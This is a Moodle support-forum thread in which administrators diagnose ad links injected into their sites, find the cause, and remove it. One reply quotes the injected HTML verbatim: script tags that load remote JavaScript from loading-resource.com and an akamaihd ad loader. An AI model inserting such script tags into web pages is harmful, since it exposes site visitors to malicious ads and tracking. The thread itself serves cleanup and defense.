Security and privacy

 
 
Picture of Dan Trouten
someone added adds to my moodle
 

I don't know if this is new or not. Some key words in the menu are linked to malicious sites. "Courses" is one of them. how do I get rid of these?

 

 
Average of ratings: -
Picture of Dan Trouten
Re: someone added adds to my moodle
 

It's "powered by text enhanced".

 
Average of ratings: -
Picture of Glenys Hanson
Re: someone added adds to my moodle
 

Hi Dan,

Maybe this can help : http://wafflesatnoon.com/2011/10/05/seeing-unwanted-text-enhance-ads/

Google came up with a lot more when I typed in "powered by text enhanced". Not sure what's relevant to you.

Cheers,

Glenys

 
Average of ratings:Useful (1)
Picture of Jenny Watt
Re: someone added adds to my moodle
 

I had the same issue. Log in as admin and turn on editing. There is an "empty" box that appears at the top of the right hand column. I removed that and the ads are gone. Trying to find where it came from now. Will post when I find it.

 
Average of ratings: -
Picture of Jenny Watt
Re: someone added adds to my moodle
 

Well, should have looked into it more before I deleted it. I just wanted the thing gone. Thinking it was an HTML block. Saw JavaScript code from other sites. This was one of them:

http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862

This was another:

http://loading-resource.com/data.geo.php?callback=window.__geo.getData

I just moved that particular site to a new host so gonna go through and check file permissions and such. Thinking this was a "hacker" attack.

Please let me know if anyone else is experiencing this.

Thanks!

Jenny

 
Average of ratings: -
Picture of Jenny Watt
Re: someone added adds to my moodle
 

Just found it in the FrontPage settings front page description block. This is the code:

<p></p>
<script src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData" type="text/javascript"></script>
<script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862" type="text/javascript"></script>
<script src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData" type="text/javascript"></script>
<script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862" type="text/javascript"></script>

Still not sure how it got there in the first place, but plan to keep an eye on the site.

 
Average of ratings: -
Picture of Emma Richardson
Re: someone added adds to my moodle
Group Particularly helpful Moodlers
I am having this same issue but cannot find where they hid the script. I have checked the html of all the description blocks on the page and in Front Page settings but still no luck. Once you got rid of it, did it come back or did you change any security measures? I am thinking this needs to be reported.
 
Average of ratings: -
Picture of Emma Richardson
Re: someone added adds to my moodle
Group Particularly helpful Moodlers

I am going to post how I was able to track this down for anyone that had this problem.

I opened the Front Page and went to View Source.  Then I searched for loading-resource.

For me the script appeared between two of my course listings.  I went to the course directly above the script and found that the course was infected as well.  In the course, I also viewed source and found and deleted all three instances of the script.  

I also then changed the password of the offending teacher(!!) and notified her.

I will keep an eye on it but hope this maybe helps someone else.

 
Average of ratings:Useful (4)
Picture of Glenys Hanson
Solved! Re: someone added adds to my moodle
 
Hi Emma, Just to say thanks for this - I'm sure it'll be useful to many. Also to add "Solved!" to the Subject so people realise that there is a solution. Cheers, Glenys
 
Average of ratings: -
Picture of zeinab khadem
Re: someone added adds to my moodle
 

HI,

I am having this same problem and I foud that some browser extensions added this script in text editors , find and delete this extension.

 
Average of ratings: -